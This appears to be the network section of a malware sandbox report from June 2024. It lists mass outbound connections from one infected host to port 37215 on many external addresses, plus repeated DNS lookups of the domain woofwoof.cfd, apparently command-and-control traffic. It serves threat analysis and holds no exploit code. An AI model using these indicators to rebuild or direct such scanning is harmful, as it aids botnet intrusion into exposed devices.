                            Jun 10, 2024 15:38:00.191720963 CEST4840637215192.168.2.1341.226.55.109
                            Jun 10, 2024 15:38:00.191720963 CEST4840637215192.168.2.1341.226.55.109
                            Jun 10, 2024 15:38:00.191968918 CEST372156050841.94.153.112192.168.2.13
                            Jun 10, 2024 15:38:00.191986084 CEST3721553280156.226.178.21192.168.2.13
                            Jun 10, 2024 15:38:00.192003965 CEST6050837215192.168.2.1341.94.153.112
                            Jun 10, 2024 15:38:00.192065954 CEST4869437215192.168.2.1341.226.55.109
                            Jun 10, 2024 15:38:00.192384005 CEST3721553568156.226.178.21192.168.2.13
                            Jun 10, 2024 15:38:00.192399979 CEST372153339641.55.41.178192.168.2.13
                            Jun 10, 2024 15:38:00.192423105 CEST5356837215192.168.2.13156.226.178.21
                            Jun 10, 2024 15:38:00.192522049 CEST4817237215192.168.2.13156.168.245.29
                            Jun 10, 2024 15:38:00.192532063 CEST4817237215192.168.2.13156.168.245.29
                            Jun 10, 2024 15:38:00.192801952 CEST372153368441.55.41.178192.168.2.13
                            Jun 10, 2024 15:38:00.192836046 CEST3368437215192.168.2.1341.55.41.178
                            Jun 10, 2024 15:38:00.192887068 CEST4846037215192.168.2.13156.168.245.29
                            Jun 10, 2024 15:38:00.193306923 CEST3465237215192.168.2.1341.154.67.6
                            Jun 10, 2024 15:38:00.193317890 CEST3465237215192.168.2.1341.154.67.6
                            Jun 10, 2024 15:38:00.193608999 CEST3494037215192.168.2.1341.154.67.6
                            Jun 10, 2024 15:38:00.193629026 CEST3721546806197.214.46.200192.168.2.13
                            Jun 10, 2024 15:38:00.193999052 CEST4357837215192.168.2.13197.105.96.234
                            Jun 10, 2024 15:38:00.194019079 CEST4357837215192.168.2.13197.105.96.234
                            Jun 10, 2024 15:38:00.194039106 CEST3721547094197.214.46.200192.168.2.13
                            Jun 10, 2024 15:38:00.194072008 CEST4709437215192.168.2.13197.214.46.200
                            Jun 10, 2024 15:38:00.194302082 CEST4386637215192.168.2.13197.105.96.234
                            Jun 10, 2024 15:38:00.194644928 CEST3721544576197.152.159.10192.168.2.13
                            Jun 10, 2024 15:38:00.194653988 CEST3721544864197.152.159.10192.168.2.13
                            Jun 10, 2024 15:38:00.194689035 CEST4486437215192.168.2.13197.152.159.10
                            Jun 10, 2024 15:38:00.194715023 CEST3740237215192.168.2.13197.153.65.158
                            Jun 10, 2024 15:38:00.194730043 CEST3740237215192.168.2.13197.153.65.158
                            Jun 10, 2024 15:38:00.195028067 CEST3769037215192.168.2.13197.153.65.158
                            Jun 10, 2024 15:38:00.195060968 CEST372155846441.57.17.164192.168.2.13
                            Jun 10, 2024 15:38:00.195069075 CEST372155875241.57.17.164192.168.2.13
                            Jun 10, 2024 15:38:00.195103884 CEST5875237215192.168.2.1341.57.17.164
                            Jun 10, 2024 15:38:00.195434093 CEST3451837215192.168.2.13156.156.125.193
                            Jun 10, 2024 15:38:00.195451021 CEST3451837215192.168.2.13156.156.125.193
                            Jun 10, 2024 15:38:00.195823908 CEST3480637215192.168.2.13156.156.125.193
                            Jun 10, 2024 15:38:00.196296930 CEST4894237215192.168.2.13197.159.13.233
                            Jun 10, 2024 15:38:00.196296930 CEST4894237215192.168.2.13197.159.13.233
                            Jun 10, 2024 15:38:00.196374893 CEST3721546504197.0.201.185192.168.2.13
                            Jun 10, 2024 15:38:00.196670055 CEST4923037215192.168.2.13197.159.13.233
                            Jun 10, 2024 15:38:00.196866989 CEST3721546792197.0.201.185192.168.2.13
                            Jun 10, 2024 15:38:00.196907043 CEST4679237215192.168.2.13197.0.201.185
                            Jun 10, 2024 15:38:00.197150946 CEST4867437215192.168.2.1341.154.147.59
                            Jun 10, 2024 15:38:00.197169065 CEST4867437215192.168.2.1341.154.147.59
                            Jun 10, 2024 15:38:00.197309971 CEST372153286241.237.134.242192.168.2.13
                            Jun 10, 2024 15:38:00.197319031 CEST372153315041.237.134.242192.168.2.13
                            Jun 10, 2024 15:38:00.197326899 CEST372154840641.226.55.109192.168.2.13
                            Jun 10, 2024 15:38:00.197355032 CEST3315037215192.168.2.1341.237.134.242
                            Jun 10, 2024 15:38:00.197536945 CEST4896237215192.168.2.1341.154.147.59
                            Jun 10, 2024 15:38:00.198031902 CEST5454437215192.168.2.13197.181.198.133
                            Jun 10, 2024 15:38:00.198031902 CEST5454437215192.168.2.13197.181.198.133
                            Jun 10, 2024 15:38:00.198055983 CEST372154869441.226.55.109192.168.2.13
                            Jun 10, 2024 15:38:00.198091984 CEST4869437215192.168.2.1341.226.55.109
                            Jun 10, 2024 15:38:00.198401928 CEST5483237215192.168.2.13197.181.198.133
                            Jun 10, 2024 15:38:00.198543072 CEST3721548172156.168.245.29192.168.2.13
                            Jun 10, 2024 15:38:00.198882103 CEST4070637215192.168.2.1341.229.216.231
                            Jun 10, 2024 15:38:00.198898077 CEST4070637215192.168.2.1341.229.216.231
                            Jun 10, 2024 15:38:00.199079037 CEST3721548460156.168.245.29192.168.2.13
                            Jun 10, 2024 15:38:00.199088097 CEST372153465241.154.67.6192.168.2.13
                            Jun 10, 2024 15:38:00.199116945 CEST4846037215192.168.2.13156.168.245.29
                            Jun 10, 2024 15:38:00.199260950 CEST4099437215192.168.2.1341.229.216.231
                            Jun 10, 2024 15:38:00.199650049 CEST372153494041.154.67.6192.168.2.13
                            Jun 10, 2024 15:38:00.199665070 CEST3721543578197.105.96.234192.168.2.13
                            Jun 10, 2024 15:38:00.199685097 CEST3494037215192.168.2.1341.154.67.6
                            Jun 10, 2024 15:38:00.199727058 CEST3505837215192.168.2.1341.251.58.239
                            Jun 10, 2024 15:38:00.199727058 CEST3505837215192.168.2.1341.251.58.239
                            Jun 10, 2024 15:38:00.200062990 CEST3534637215192.168.2.1341.251.58.239
                            Jun 10, 2024 15:38:00.200078011 CEST3721543866197.105.96.234192.168.2.13
                            Jun 10, 2024 15:38:00.200114965 CEST4386637215192.168.2.13197.105.96.234
                            Jun 10, 2024 15:38:00.200486898 CEST3899037215192.168.2.13197.73.57.101
                            Jun 10, 2024 15:38:00.200486898 CEST3899037215192.168.2.13197.73.57.101
                            Jun 10, 2024 15:38:00.200695992 CEST3721537402197.153.65.158192.168.2.13
                            Jun 10, 2024 15:38:00.200705051 CEST3721537690197.153.65.158192.168.2.13
                            Jun 10, 2024 15:38:00.200737000 CEST3769037215192.168.2.13197.153.65.158
                            Jun 10, 2024 15:38:00.200809956 CEST3927837215192.168.2.13197.73.57.101
                            Jun 10, 2024 15:38:00.201122046 CEST3721534518156.156.125.193192.168.2.13
                            Jun 10, 2024 15:38:00.201248884 CEST5697637215192.168.2.13156.79.171.4
                            Jun 10, 2024 15:38:00.201248884 CEST5697637215192.168.2.13156.79.171.4
                            Jun 10, 2024 15:38:00.201572895 CEST5726437215192.168.2.13156.79.171.4
                            Jun 10, 2024 15:38:00.201714039 CEST3721534806156.156.125.193192.168.2.13
                            Jun 10, 2024 15:38:00.201755047 CEST3480637215192.168.2.13156.156.125.193
                            Jun 10, 2024 15:38:00.201759100 CEST3721548942197.159.13.233192.168.2.13
                            Jun 10, 2024 15:38:00.201767921 CEST3721549230197.159.13.233192.168.2.13
                            Jun 10, 2024 15:38:00.201797009 CEST4923037215192.168.2.13197.159.13.233
                            Jun 10, 2024 15:38:00.201992989 CEST3446437215192.168.2.13197.63.251.49
                            Jun 10, 2024 15:38:00.201992989 CEST3446437215192.168.2.13197.63.251.49
                            Jun 10, 2024 15:38:00.202321053 CEST372154867441.154.147.59192.168.2.13
                            Jun 10, 2024 15:38:00.202353001 CEST3475237215192.168.2.13197.63.251.49
                            Jun 10, 2024 15:38:00.202796936 CEST4911437215192.168.2.1341.206.110.186
                            Jun 10, 2024 15:38:00.202796936 CEST4911437215192.168.2.1341.206.110.186
                            Jun 10, 2024 15:38:00.202836990 CEST372154896241.154.147.59192.168.2.13
                            Jun 10, 2024 15:38:00.202874899 CEST4896237215192.168.2.1341.154.147.59
                            Jun 10, 2024 15:38:00.203120947 CEST4940237215192.168.2.1341.206.110.186
                            Jun 10, 2024 15:38:00.203373909 CEST3721554544197.181.198.133192.168.2.13
                            Jun 10, 2024 15:38:00.203547001 CEST4567837215192.168.2.13197.246.123.244
                            Jun 10, 2024 15:38:00.203547001 CEST4567837215192.168.2.13197.246.123.244
                            Jun 10, 2024 15:38:00.203876019 CEST4596637215192.168.2.13197.246.123.244
                            Jun 10, 2024 15:38:00.203996897 CEST3721554832197.181.198.133192.168.2.13
                            Jun 10, 2024 15:38:00.204034090 CEST5483237215192.168.2.13197.181.198.133
                            Jun 10, 2024 15:38:00.204044104 CEST372154070641.229.216.231192.168.2.13
                            Jun 10, 2024 15:38:00.204323053 CEST4556437215192.168.2.1341.168.73.24
                            Jun 10, 2024 15:38:00.204323053 CEST4556437215192.168.2.1341.168.73.24
                            Jun 10, 2024 15:38:00.204550028 CEST372154099441.229.216.231192.168.2.13
                            Jun 10, 2024 15:38:00.204586029 CEST4099437215192.168.2.1341.229.216.231
                            Jun 10, 2024 15:38:00.204672098 CEST4585237215192.168.2.1341.168.73.24
                            Jun 10, 2024 15:38:00.205113888 CEST4311637215192.168.2.1341.237.191.106
                            Jun 10, 2024 15:38:00.205113888 CEST4311637215192.168.2.1341.237.191.106
                            Jun 10, 2024 15:38:00.205147982 CEST372153505841.251.58.239192.168.2.13
                            Jun 10, 2024 15:38:00.205157995 CEST372153534641.251.58.239192.168.2.13
                            Jun 10, 2024 15:38:00.205188036 CEST3534637215192.168.2.1341.251.58.239
                            Jun 10, 2024 15:38:00.205432892 CEST4340437215192.168.2.1341.237.191.106
                            Jun 10, 2024 15:38:00.205678940 CEST3721538990197.73.57.101192.168.2.13
                            Jun 10, 2024 15:38:00.205893040 CEST3661037215192.168.2.13197.128.46.215
                            Jun 10, 2024 15:38:00.205909967 CEST3661037215192.168.2.13197.128.46.215
                            Jun 10, 2024 15:38:00.206197023 CEST3721539278197.73.57.101192.168.2.13
                            Jun 10, 2024 15:38:00.206216097 CEST3721556976156.79.171.4192.168.2.13
                            Jun 10, 2024 15:38:00.206228018 CEST3927837215192.168.2.13197.73.57.101
                            Jun 10, 2024 15:38:00.206264973 CEST3689837215192.168.2.13197.128.46.215
                            Jun 10, 2024 15:38:00.206691980 CEST4767637215192.168.2.1341.39.55.229
                            Jun 10, 2024 15:38:00.206691980 CEST4767637215192.168.2.1341.39.55.229
                            Jun 10, 2024 15:38:00.206783056 CEST3721557264156.79.171.4192.168.2.13
                            Jun 10, 2024 15:38:00.206816912 CEST5726437215192.168.2.13156.79.171.4
                            Jun 10, 2024 15:38:00.207021952 CEST4796437215192.168.2.1341.39.55.229
                            Jun 10, 2024 15:38:00.207385063 CEST3721534464197.63.251.49192.168.2.13
                            Jun 10, 2024 15:38:00.207393885 CEST3721534752197.63.251.49192.168.2.13
                            Jun 10, 2024 15:38:00.207437038 CEST3475237215192.168.2.13197.63.251.49
                            Jun 10, 2024 15:38:00.207478046 CEST5920237215192.168.2.13156.200.117.215
                            Jun 10, 2024 15:38:00.207478046 CEST5920237215192.168.2.13156.200.117.215
                            Jun 10, 2024 15:38:00.207804918 CEST5949037215192.168.2.13156.200.117.215
                            Jun 10, 2024 15:38:00.207967997 CEST372154911441.206.110.186192.168.2.13
                            Jun 10, 2024 15:38:00.208123922 CEST372154896241.154.147.59192.168.2.13
                            Jun 10, 2024 15:38:00.208229065 CEST5886437215192.168.2.13156.181.42.38
                            Jun 10, 2024 15:38:00.208239079 CEST5886437215192.168.2.13156.181.42.38
                            Jun 10, 2024 15:38:00.208498955 CEST372154940241.206.110.186192.168.2.13
                            Jun 10, 2024 15:38:00.208534002 CEST4940237215192.168.2.1341.206.110.186
                            Jun 10, 2024 15:38:00.208547115 CEST3721545678197.246.123.244192.168.2.13
                            Jun 10, 2024 15:38:00.208550930 CEST5915237215192.168.2.13156.181.42.38
                            Jun 10, 2024 15:38:00.208651066 CEST3721545966197.246.123.244192.168.2.13
                            Jun 10, 2024 15:38:00.208682060 CEST4596637215192.168.2.13197.246.123.244
                            Jun 10, 2024 15:38:00.208905935 CEST3721554832197.181.198.133192.168.2.13
                            Jun 10, 2024 15:38:00.208966017 CEST4207437215192.168.2.13156.250.0.84
                            Jun 10, 2024 15:38:00.208966017 CEST4207437215192.168.2.13156.250.0.84
                            Jun 10, 2024 15:38:00.209134102 CEST372154556441.168.73.24192.168.2.13
                            Jun 10, 2024 15:38:00.209305048 CEST4236237215192.168.2.13156.250.0.84
                            Jun 10, 2024 15:38:00.209434986 CEST372154585241.168.73.24192.168.2.13
                            Jun 10, 2024 15:38:00.209476948 CEST372154099441.229.216.231192.168.2.13
                            Jun 10, 2024 15:38:00.209481955 CEST4585237215192.168.2.1341.168.73.24
                            Jun 10, 2024 15:38:00.209800005 CEST4602837215192.168.2.13156.46.209.218
                            Jun 10, 2024 15:38:00.209800005 CEST4602837215192.168.2.13156.46.209.218
                            Jun 10, 2024 15:38:00.209975004 CEST372154311641.237.191.106192.168.2.13
                            Jun 10, 2024 15:38:00.210165977 CEST4631637215192.168.2.13156.46.209.218
                            Jun 10, 2024 15:38:00.210246086 CEST372153534641.251.58.239192.168.2.13
                            Jun 10, 2024 15:38:00.210253954 CEST372154340441.237.191.106192.168.2.13
                            Jun 10, 2024 15:38:00.210289955 CEST4340437215192.168.2.1341.237.191.106
                            Jun 10, 2024 15:38:00.210602999 CEST372153354041.69.228.208192.168.2.13
                            Jun 10, 2024 15:38:00.210611105 CEST3721557854156.211.139.234192.168.2.13
                            Jun 10, 2024 15:38:00.210618973 CEST3721544468156.134.62.117192.168.2.13
                            Jun 10, 2024 15:38:00.210628033 CEST3721548850156.202.215.189192.168.2.13
                            Jun 10, 2024 15:38:00.210634947 CEST3721560154197.176.59.104192.168.2.13
                            Jun 10, 2024 15:38:00.210637093 CEST5021037215192.168.2.13156.62.210.214
                            Jun 10, 2024 15:38:00.210642099 CEST3721555306156.199.176.162192.168.2.13
                            Jun 10, 2024 15:38:00.210649967 CEST372153769841.34.192.208192.168.2.13
                            Jun 10, 2024 15:38:00.210678101 CEST5021037215192.168.2.13156.62.210.214
                            Jun 10, 2024 15:38:00.210840940 CEST3721536610197.128.46.215192.168.2.13
                            Jun 10, 2024 15:38:00.211035967 CEST5049837215192.168.2.13156.62.210.214
                            Jun 10, 2024 15:38:00.211060047 CEST3721536898197.128.46.215192.168.2.13
                            Jun 10, 2024 15:38:00.211097002 CEST3689837215192.168.2.13197.128.46.215
                            Jun 10, 2024 15:38:00.211143970 CEST3721539278197.73.57.101192.168.2.13
                            Jun 10, 2024 15:38:00.211497068 CEST4592237215192.168.2.13156.25.179.14
                            Jun 10, 2024 15:38:00.211509943 CEST4592237215192.168.2.13156.25.179.14
                            Jun 10, 2024 15:38:00.211560011 CEST372154767641.39.55.229192.168.2.13
                            Jun 10, 2024 15:38:00.211790085 CEST372154796441.39.55.229192.168.2.13
                            Jun 10, 2024 15:38:00.211829901 CEST4796437215192.168.2.1341.39.55.229
                            Jun 10, 2024 15:38:00.211859941 CEST4621037215192.168.2.13156.25.179.14
                            Jun 10, 2024 15:38:00.211884975 CEST3721557264156.79.171.4192.168.2.13
                            Jun 10, 2024 15:38:00.211893082 CEST4099437215192.168.2.1341.229.216.231
                            Jun 10, 2024 15:38:00.211893082 CEST3927837215192.168.2.13197.73.57.101
                            Jun 10, 2024 15:38:00.211900949 CEST5483237215192.168.2.13197.181.198.133
                            Jun 10, 2024 15:38:00.211908102 CEST3534637215192.168.2.1341.251.58.239
                            Jun 10, 2024 15:38:00.211908102 CEST4896237215192.168.2.1341.154.147.59
                            Jun 10, 2024 15:38:00.212308884 CEST5590037215192.168.2.13197.128.202.20
                            Jun 10, 2024 15:38:00.212321043 CEST5590037215192.168.2.13197.128.202.20
                            Jun 10, 2024 15:38:00.212332964 CEST3721559202156.200.117.215192.168.2.13
                            Jun 10, 2024 15:38:00.212413073 CEST3721534752197.63.251.49192.168.2.13
                            Jun 10, 2024 15:38:00.212626934 CEST3721559490156.200.117.215192.168.2.13
                            Jun 10, 2024 15:38:00.212663889 CEST5949037215192.168.2.13156.200.117.215
                            Jun 10, 2024 15:38:00.212682962 CEST5618837215192.168.2.13197.128.202.20
                            Jun 10, 2024 15:38:00.213044882 CEST3721558864156.181.42.38192.168.2.13
                            Jun 10, 2024 15:38:00.213145971 CEST4487437215192.168.2.13197.126.47.34
                            Jun 10, 2024 15:38:00.213145971 CEST4487437215192.168.2.13197.126.47.34
                            Jun 10, 2024 15:38:00.213381052 CEST3721559152156.181.42.38192.168.2.13
                            Jun 10, 2024 15:38:00.213421106 CEST5915237215192.168.2.13156.181.42.38
                            Jun 10, 2024 15:38:00.213460922 CEST372154940241.206.110.186192.168.2.13
                            Jun 10, 2024 15:38:00.213521004 CEST4516237215192.168.2.13197.126.47.34
                            Jun 10, 2024 15:38:00.213577986 CEST3721545966197.246.123.244192.168.2.13
                            Jun 10, 2024 15:38:00.213749886 CEST3721542074156.250.0.84192.168.2.13
                            Jun 10, 2024 15:38:00.213967085 CEST5810637215192.168.2.13197.144.113.129
                            Jun 10, 2024 15:38:00.213967085 CEST5810637215192.168.2.13197.144.113.129
                            Jun 10, 2024 15:38:00.214133978 CEST3721542362156.250.0.84192.168.2.13
                            Jun 10, 2024 15:38:00.214171886 CEST4236237215192.168.2.13156.250.0.84
                            Jun 10, 2024 15:38:00.214312077 CEST5839437215192.168.2.13197.144.113.129
                            Jun 10, 2024 15:38:00.214446068 CEST372154585241.168.73.24192.168.2.13
                            Jun 10, 2024 15:38:00.214608908 CEST3721546028156.46.209.218192.168.2.13
                            Jun 10, 2024 15:38:00.214767933 CEST5092637215192.168.2.13197.29.244.234
                            Jun 10, 2024 15:38:00.214778900 CEST5092637215192.168.2.13197.29.244.234
                            Jun 10, 2024 15:38:00.214968920 CEST3721546316156.46.209.218192.168.2.13
                            Jun 10, 2024 15:38:00.215009928 CEST4631637215192.168.2.13156.46.209.218
                            Jun 10, 2024 15:38:00.215131044 CEST5121437215192.168.2.13197.29.244.234
                            Jun 10, 2024 15:38:00.215202093 CEST372154340441.237.191.106192.168.2.13
                            Jun 10, 2024 15:38:00.215450048 CEST3721550210156.62.210.214192.168.2.13
                            Jun 10, 2024 15:38:00.215590000 CEST5753437215192.168.2.13156.166.206.200
                            Jun 10, 2024 15:38:00.215600967 CEST5753437215192.168.2.13156.166.206.200
                            Jun 10, 2024 15:38:00.215879917 CEST3721550498156.62.210.214192.168.2.13
                            Jun 10, 2024 15:38:00.215893030 CEST4340437215192.168.2.1341.237.191.106
                            Jun 10, 2024 15:38:00.215898991 CEST4585237215192.168.2.1341.168.73.24
                            Jun 10, 2024 15:38:00.215898991 CEST4596637215192.168.2.13197.246.123.244
                            Jun 10, 2024 15:38:00.215918064 CEST3475237215192.168.2.13197.63.251.49
                            Jun 10, 2024 15:38:00.215925932 CEST5049837215192.168.2.13156.62.210.214
                            Jun 10, 2024 15:38:00.215944052 CEST5782237215192.168.2.13156.166.206.200
                            Jun 10, 2024 15:38:00.216094971 CEST3721536898197.128.46.215192.168.2.13
                            Jun 10, 2024 15:38:00.216327906 CEST3721545922156.25.179.14192.168.2.13
                            Jun 10, 2024 15:38:00.216411114 CEST3448237215192.168.2.1341.10.140.61
                            Jun 10, 2024 15:38:00.216423035 CEST3448237215192.168.2.1341.10.140.61
                            Jun 10, 2024 15:38:00.216763973 CEST3721546210156.25.179.14192.168.2.13
                            Jun 10, 2024 15:38:00.216783047 CEST3477037215192.168.2.1341.10.140.61
                            Jun 10, 2024 15:38:00.216799021 CEST4621037215192.168.2.13156.25.179.14
                            Jun 10, 2024 15:38:00.216811895 CEST372154796441.39.55.229192.168.2.13
                            Jun 10, 2024 15:38:00.217170000 CEST3721555900197.128.202.20192.168.2.13
                            Jun 10, 2024 15:38:00.217259884 CEST4138437215192.168.2.13156.203.151.228
                            Jun 10, 2024 15:38:00.217259884 CEST4138437215192.168.2.13156.203.151.228
                            Jun 10, 2024 15:38:00.217499018 CEST3721556188197.128.202.20192.168.2.13
                            Jun 10, 2024 15:38:00.217538118 CEST5618837215192.168.2.13197.128.202.20
                            Jun 10, 2024 15:38:00.217607021 CEST3721559490156.200.117.215192.168.2.13
                            Jun 10, 2024 15:38:00.217622042 CEST4167237215192.168.2.13156.203.151.228
                            Jun 10, 2024 15:38:00.217955112 CEST3721544874197.126.47.34192.168.2.13
                            Jun 10, 2024 15:38:00.218072891 CEST4526237215192.168.2.13156.193.239.253
                            Jun 10, 2024 15:38:00.218089104 CEST4526237215192.168.2.13156.193.239.253
                            Jun 10, 2024 15:38:00.218329906 CEST3721545162197.126.47.34192.168.2.13
                            Jun 10, 2024 15:38:00.218367100 CEST4516237215192.168.2.13197.126.47.34
                            Jun 10, 2024 15:38:00.218425989 CEST4555037215192.168.2.13156.193.239.253
                            Jun 10, 2024 15:38:00.218449116 CEST3721559152156.181.42.38192.168.2.13
                            Jun 10, 2024 15:38:00.218592882 CEST3721560102197.140.21.238192.168.2.13
                            Jun 10, 2024 15:38:00.218655109 CEST3721559702156.123.237.221192.168.2.13
                            Jun 10, 2024 15:38:00.218662024 CEST372153463241.79.189.48192.168.2.13
                            Jun 10, 2024 15:38:00.218669891 CEST372153652241.139.140.243192.168.2.13
                            Jun 10, 2024 15:38:00.218676090 CEST372155767841.13.119.15192.168.2.13
                            Jun 10, 2024 15:38:00.218683958 CEST3721537844156.195.94.23192.168.2.13
                            Jun 10, 2024 15:38:00.218691111 CEST372155746441.65.114.229192.168.2.13
                            Jun 10, 2024 15:38:00.218698025 CEST3721555296156.209.45.106192.168.2.13
                            Jun 10, 2024 15:38:00.218755960 CEST3721558106197.144.113.129192.168.2.13
                            Jun 10, 2024 15:38:00.218889952 CEST4736437215192.168.2.13156.60.167.234
                            Jun 10, 2024 15:38:00.218904972 CEST4736437215192.168.2.13156.60.167.234
                            Jun 10, 2024 15:38:00.219089031 CEST3721558394197.144.113.129192.168.2.13
                            Jun 10, 2024 15:38:00.219131947 CEST5839437215192.168.2.13197.144.113.129
                            Jun 10, 2024 15:38:00.219212055 CEST3721542362156.250.0.84192.168.2.13
                            Jun 10, 2024 15:38:00.219261885 CEST4765237215192.168.2.13156.60.167.234
                            Jun 10, 2024 15:38:00.219718933 CEST3721550926197.29.244.234192.168.2.13
                            Jun 10, 2024 15:38:00.219729900 CEST4659437215192.168.2.1341.228.140.97
                            Jun 10, 2024 15:38:00.219729900 CEST4659437215192.168.2.1341.228.140.97
                            Jun 10, 2024 15:38:00.219890118 CEST4236237215192.168.2.13156.250.0.84
                            Jun 10, 2024 15:38:00.219892979 CEST5949037215192.168.2.13156.200.117.215
                            Jun 10, 2024 15:38:00.219894886 CEST4940237215192.168.2.1341.206.110.186
                            Jun 10, 2024 15:38:00.219899893 CEST5726437215192.168.2.13156.79.171.4
                            Jun 10, 2024 15:38:00.219899893 CEST4796437215192.168.2.1341.39.55.229
                            Jun 10, 2024 15:38:00.219902039 CEST5915237215192.168.2.13156.181.42.38
                            Jun 10, 2024 15:38:00.219907045 CEST3689837215192.168.2.13197.128.46.215
                            Jun 10, 2024 15:38:00.219922066 CEST3721551214197.29.244.234192.168.2.13
                            Jun 10, 2024 15:38:00.219961882 CEST5121437215192.168.2.13197.29.244.234
                            Jun 10, 2024 15:38:00.220097065 CEST3721546316156.46.209.218192.168.2.13
                            Jun 10, 2024 15:38:00.220141888 CEST4688237215192.168.2.1341.228.140.97
                            Jun 10, 2024 15:38:00.220423937 CEST3721557534156.166.206.200192.168.2.13
                            Jun 10, 2024 15:38:00.220634937 CEST3465437215192.168.2.13156.16.252.113
                            Jun 10, 2024 15:38:00.220634937 CEST3465437215192.168.2.13156.16.252.113
                            Jun 10, 2024 15:38:00.220845938 CEST3721557822156.166.206.200192.168.2.13
                            Jun 10, 2024 15:38:00.220880032 CEST5782237215192.168.2.13156.166.206.200
                            Jun 10, 2024 15:38:00.220954895 CEST3721550498156.62.210.214192.168.2.13
                            Jun 10, 2024 15:38:00.221019030 CEST3494237215192.168.2.13156.16.252.113
                            Jun 10, 2024 15:38:00.221193075 CEST372153448241.10.140.61192.168.2.13
                            Jun 10, 2024 15:38:00.221508026 CEST5414037215192.168.2.13197.225.243.209
                            Jun 10, 2024 15:38:00.221508026 CEST5414037215192.168.2.13197.225.243.209
                            Jun 10, 2024 15:38:00.221601009 CEST372153477041.10.140.61192.168.2.13
                            Jun 10, 2024 15:38:00.221642971 CEST3477037215192.168.2.1341.10.140.61
                            Jun 10, 2024 15:38:00.221726894 CEST3721546210156.25.179.14192.168.2.13
                            Jun 10, 2024 15:38:00.221888065 CEST5442837215192.168.2.13197.225.243.209
                            Jun 10, 2024 15:38:00.222049952 CEST3721541384156.203.151.228192.168.2.13
                            Jun 10, 2024 15:38:00.222372055 CEST5707437215192.168.2.1341.9.164.177
                            Jun 10, 2024 15:38:00.222382069 CEST5707437215192.168.2.1341.9.164.177
                            Jun 10, 2024 15:38:00.222440004 CEST3721541672156.203.151.228192.168.2.13
                            Jun 10, 2024 15:38:00.222449064 CEST3721556188197.128.202.20192.168.2.13
                            Jun 10, 2024 15:38:00.222475052 CEST4167237215192.168.2.13156.203.151.228
                            Jun 10, 2024 15:38:00.222747087 CEST5736237215192.168.2.1341.9.164.177
                            Jun 10, 2024 15:38:00.222878933 CEST3721545262156.193.239.253192.168.2.13
                            Jun 10, 2024 15:38:00.223242044 CEST5004237215192.168.2.13197.42.26.190
                            Jun 10, 2024 15:38:00.223242044 CEST5004237215192.168.2.13197.42.26.190
                            Jun 10, 2024 15:38:00.223314047 CEST3721545550156.193.239.253192.168.2.13
                            Jun 10, 2024 15:38:00.223323107 CEST3721545162197.126.47.34192.168.2.13
                            Jun 10, 2024 15:38:00.223346949 CEST4555037215192.168.2.13156.193.239.253
                            Jun 10, 2024 15:38:00.223607063 CEST5033037215192.168.2.13197.42.26.190
                            Jun 10, 2024 15:38:00.223692894 CEST3721547364156.60.167.234192.168.2.13
                            Jun 10, 2024 15:38:00.223896027 CEST4516237215192.168.2.13197.126.47.34
                            Jun 10, 2024 15:38:00.223897934 CEST4621037215192.168.2.13156.25.179.14
                            Jun 10, 2024 15:38:00.223905087 CEST5049837215192.168.2.13156.62.210.214
                            Jun 10, 2024 15:38:00.223913908 CEST4631637215192.168.2.13156.46.209.218
                            Jun 10, 2024 15:38:00.224052906 CEST3721547652156.60.167.234192.168.2.13
                            Jun 10, 2024 15:38:00.224091053 CEST4765237215192.168.2.13156.60.167.234
                            Jun 10, 2024 15:38:00.224095106 CEST3721558394197.144.113.129192.168.2.13
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jun 10, 2024 15:37:58.472934961 CEST192.168.2.138.8.8.80x502fStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:08.020407915 CEST192.168.2.138.8.8.80xcb44Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:08.898241043 CEST192.168.2.138.8.8.80x3e1eStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:18.409126043 CEST192.168.2.138.8.8.80xd0aStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:19.272499084 CEST192.168.2.138.8.8.80xf2a9Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:20.143284082 CEST192.168.2.138.8.8.80xcb81Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:20.998470068 CEST192.168.2.138.8.8.80x32e0Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:21.874524117 CEST192.168.2.138.8.8.80x8357Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:31.369682074 CEST192.168.2.138.8.8.80x1b28Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:40.866195917 CEST192.168.2.138.8.8.80x17dcStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:41.721981049 CEST192.168.2.138.8.8.80x5b42Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:42.570431948 CEST192.168.2.138.8.8.80xf4beStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:52.069279909 CEST192.168.2.138.8.8.80xeb7dStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:52.920135975 CEST192.168.2.138.8.8.80x6d24Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:53.772679090 CEST192.168.2.138.8.8.80x119bStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:54.872304916 CEST192.168.2.138.8.8.80xd19eStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:38:55.723572016 CEST192.168.2.138.8.8.80x391cStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:05.214247942 CEST192.168.2.138.8.8.80xa6b4Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:14.710688114 CEST192.168.2.138.8.8.80x7c3aStandard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:15.544253111 CEST192.168.2.138.8.8.80xfed4Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
                            Jun 10, 2024 15:39:25.031245947 CEST192.168.2.138.8.8.80x4874Standard query (0)woofwoof.cfdA (IP address)IN (0x0001)false
